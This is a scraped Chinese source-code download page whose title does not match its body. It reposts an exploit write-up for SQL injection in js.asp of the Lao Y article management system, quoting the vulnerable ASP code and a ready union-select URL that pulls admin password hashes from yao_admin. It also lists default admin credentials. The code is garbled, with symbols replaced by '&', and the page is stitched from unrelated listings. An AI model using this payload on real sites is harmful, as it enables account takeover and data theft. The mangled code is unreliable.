老y文章酒店管理系统源码码

来源:蜘蛛抓取(WebSpider) 时间:2011-08-07 18:38 标签: 酒店管理系统源码
老Y文章管理系统注射0day
幻泉[B.S.N] 黑客防线
漏洞等级:中等 漏洞说明:
漏洞出现在js.asp中,我们首先看源代码。
If CheckStr(Request("ClassNo")) && "" then ClassNo = split(CheckStr(Request("ClassNo")),"|") '这里是获取变量利用checkstr过滤,但是感觉好像没起作用。然后分成数组 on error resume next NClassID = LaoYRequest(ClassNo(0)) NClassID1 = LaoYRequest(ClassNo(1)) '获取数组1,与数组2进行整形过滤。这里没有漏洞 End if
num = LaoYRequest(request.querystring("num"))'这里num必须&=1 ....... set rs=server.createObject("Adodb.recordset") sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
&&&&&&& If NclassID&&"" and NclassID1="" then &&&&&&&&&&&&&&& If Yao_MyID(NclassID)="0" then &&&&&&&&&&&&&&&&&&&&&&& SQL=SQL&" and ClassID="&NclassID&"" &&&&&&&&&&&&&&& else &&&&&&&&&&&&&&&&&&&&&&& MyID = Replace(""&Yao_MyID(NclassID)&"","|",",") &&&&&&&&&&&&&&&&&&&&&&& SQL=SQL&" and ClassID in ("&MyID&")" &&&&&&&&&&&&&&& End if &&&&&&& elseif NclassID&&"" and NclassID1&&"" then &&&&&&&&&&&&&&& MyID = Replace(""&Request("ClassNo")&"","|",",") &&&&&&&&&&&&&&& SQL=SQL&" and ClassID in ("&MyID&")" &&&&&&&&&&&&&&& '这里出现的问题classno并没做其他过滤就写入到查询 &&&&&&& End if &&&&&&&& select case topType &&&&&&& case "new" sql=sql&" order by DateAndTime desc,ID desc" &&&&&&& case "hot" sql=sql&" order by hits desc,ID desc" &&&&&&& case "IsHot" sql=sql&" and IsHot = 1 order by ID desc" end select
set rs = conn.execute(sql) if rs.bof and rs.eof then str=str+"没有符合条件的文章" ........
-------------------------------
function.asp
Code:function CheckStr(str) &&& CheckStr=replace(replace(replace(replace(str,"&","&"),"&","&"),chr(13),"")," ","") &&&&&&& CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","") &&& CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"") &&&&&&& CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","") end function
利用代码: js.asp?num=1&ClassNo=1|1|1[SQL] js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 ####获取密码代码
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】&&下载仅需要0金币
文件大小:3.30MB&&&
贡献者:chchsxw&&&
贡献时间:日&&&
资源描述:如果放在根目录,不需要修改任何东西即可运行
如果放在虚拟目录,请打开inc/config.asp修改网站路径
请确保你的空间支持FSO及AspJpeg组件,否则可能有些功能无法使用
(建议购买官方专用空间120/年,含300M网站空间,100M邮箱空间,上海电信及网通机房,支持老Y文章管理系统所有功能.联系QQ)
管理路径admin/admin_login.asp,用户名及密码都是admin
你可以删除UploadFiles目录下的图片,但要保留s90,s250,Userface,link,ad等几个文件夹
安全设置[重要]:
登陆后台后请马上修改用户名及密码
后台配置--管理目录:更改管理目录名,并将原Admin文件夹重命名
有问题请上官方网站:反馈
v2.4版更新:
1.后台标题栏显示网站名称
2.分页增加快速跳转到某页功能
3.缩略图上传改为等比例切割,防止变形
4.解决空间不支持AspJpeg不显示小图的问题
5.前台会员登录增加是否保存Cookies选项
6.编辑器只保留一个eWebEditor并升级版本至5.5
7.解决后台超时问题
8.解决修改管理员密码后可能无法登录的情况
9.解决IE8下不能上传图片的问题
10.会员发表文章增加验证码及时间间隔
11.发表评论添加表情功能
12.增加投票调查功能
13.栏目增加副标题,有利于搜索引擎收录
14.站内关键字链接功能
其它一些小修改
相关标签:
同类热门源码
你可能喜欢
该用户的其它源码
所需金币:
文件大小:3.30MB
您当前剩余金币:0&&下载仅需要0金币
文件大小:4.64MB&&&
贡献者:yussue&&&
贡献时间:日&&&
老Y文章系统纯静态版v1.0(依照老Y官方v3.0sp1修改)。
关于升级:如果没有改动下列文件,则其它文件按照老Y官方升级替换。
Index.asp 修改显示首页幻灯片纯静态网页连接
Js.asp 增加纯静态模式下外部调用
Sitemap.asp 修改显示纯静态模式下网站地图
Search.asp 增加修改纯静态模式下的网站搜索
Admin/Admin_Class.asp 增加分类静态化功能和删除时也删除静态化分类页.
Admin/Left.asp 增加后台纯静态生成管理和字符串批量替换功能
Admin/Main.asp 增加初始化网站时也同时删除所有生成的纯静态网页
Admin/Admin_Article.asp 修改增加生成静态功能和删除生成的静态页功能:
增加选中的文章 生成静态 网页,同时也生成文章页所在的分类的静态化网页.
增加删除文章时也同时删除存在的文章纯静态页,并重新生成新的文章分类页.
特别提醒:全站生成纯静态 html 网页后,别忘了首页静态哦。
&&&&&&&&&&源码自带修改过的 ASP调试工具 好过源动力的工具。
&&&&&&&&&&可以本地调试所有功能,源动力的不能本地生成静态。
特别赠送:
Guestbook_2.asp 仿老Y官方论坛型留言本,可以重命名替换原来的留言本.
以管理员身份前台登陆后即可管理论坛型留言本.
BBS/ 仿动网论坛,如果不满意上述论坛型留言本,可用配合这个真正的论坛.
论坛介绍 /bbs/showbbs.asp?bd=2&id=1&totable=1
老Y文章系统纯静态版v1.0自带增强的伪原创采集系统,10000多个词条。
老y文章管理系统,采用Asp+Access开发,适应中小新闻文章型网站及个人网站需求,整个网站采用Div+Css布局,IE6、IE7、IE8、Firefox、Chrome下测试无误.
相关标签:
同类热门源码
你可能喜欢
该用户的其它源码
所需金币:
文件大小:4.64MB
您当前剩余金币:0

我要回帖

更多关于 酒店管理系统源码 的文章

 

随机推荐